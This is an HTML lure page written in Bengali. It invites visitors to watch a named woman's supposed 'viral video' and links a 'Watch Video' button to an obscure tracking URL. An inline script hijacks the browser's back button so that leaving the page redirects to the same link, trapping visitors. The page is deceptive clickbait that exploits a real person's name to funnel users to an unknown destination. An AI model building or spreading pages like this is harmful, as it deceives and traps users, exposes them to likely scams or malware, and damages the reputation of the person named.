<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Special Event</title>
    
    
  <link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Noto+Serif+Bengali:wght@100..900&display=swap" rel="stylesheet">

    <style>
      
      * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
}

body {
    background-color: #d2eaff;
    font-family: 'Arial', sans-serif;
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
}

.container {
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100%;
}

.card {
    background: linear-gradient(135deg, #319aff, #8ed0ff);
    padding: 20px;
    border-radius: 20px;
    box-shadow: 0 8px 20px rgba(0, 0, 0, 0.2);
    text-align: center;
    width: 320px;
    animation: bounceIn 1s ease-in-out;
}

@keyframes bounceIn {
    0% {
        transform: scale(0.5);
        opacity: 0.5;
    }
    50% {
        transform: scale(1.05);
        opacity: 1;
    }
    100% {
        transform: scale(1);
        opacity: 1;
    }
}

.event-image {
    width: 90%;
    
    border: 3px solid rgba(0, 0, 0, 0.5);
    border-radius: 20px;
    margin-bottom: 10px;
    animation: fadeIn 1s ease-in-out;
}

@keyframes fadeIn {
    from {
        opacity: 0;
    }
    to {
        opacity: 1;
    }
}


.description {
    color: #000;
    font-family: 'Noto Serif Bengali', sans-serif;
    font-size: 15px;
    font-weight: bold;
    margin-bottom: 20px;
    animation: fadeIn 1.5s ease-in-out;
}

.claim-button {
  background-color: #0942ff;
  color: #fff;
  padding: 10px 50px;
  border-top-right-radius: 100px;
  border-bottom-left-radius: 100px;
  border-top-left-radius: 5px;
  border-bottom-right-radius: 5px;
  text-decoration: none;
  font-weight: bold;
  display: inline-block;
  box-shadow: 0 4px 15px rgba(0,0,0,0.2);
  transition: background-color 0.2s, transform 0.1s;
  margin-top: 10px;
  position: relative;
  overflow: hidden;
  outline: none;
  font-family: sans-serif;
  text-transform: uppercase;
  font-size: 18px;
}

.claim-button:active {
    background-color: #5d00c5;
    transform: scale(0.9);
    
}
      
      
.claim-button::after {
  content: '';
  position: absolute;
  top: -50%;
  left: -50%;
  width: 200%;
  height: 200%;
  background: linear-gradient(to bottom right, rgba(255, 255, 255, 0.30), rgba(255, 255, 255, 0.0));

  transform: rotate(45deg);
  animation: shine 3s ease-in-out infinite;
}

@keyframes shine {
        0% { transform: translateX(-100%) rotate(45deg); }
        100% { transform: translateX(100%) rotate(45deg); }
        }
    </style>
    
    
    <script>
      history.pushState(null, null, location.href);
      window.addEventListener('popstate', function() {
        location.href = 'https://relishsinew.com/xtq8c77dhf?key=8276338a06bdc985e6313ad906516159';
      });
    </script>
    
</head>
<body>
    <div class="container">
        <div class="card">
            <img src="img.jpg" alt="Event Image" class="event-image">

            <p class="description">যারা এখনো জান্নাত তোহার ভাইরাল ভিডিও দেখেননি তারা আজকে দেখে নিন। ভিডিও দেখতে নিচের Watch Video বাটনে ক্লিক করুন।</p>
            <a href="https://relishsinew.com/xtq8c77dhf?key=8276338a06bdc985e6313ad906516159" class="claim-button">Watch Video</a>
        </div>
    </div>
</body>
</html>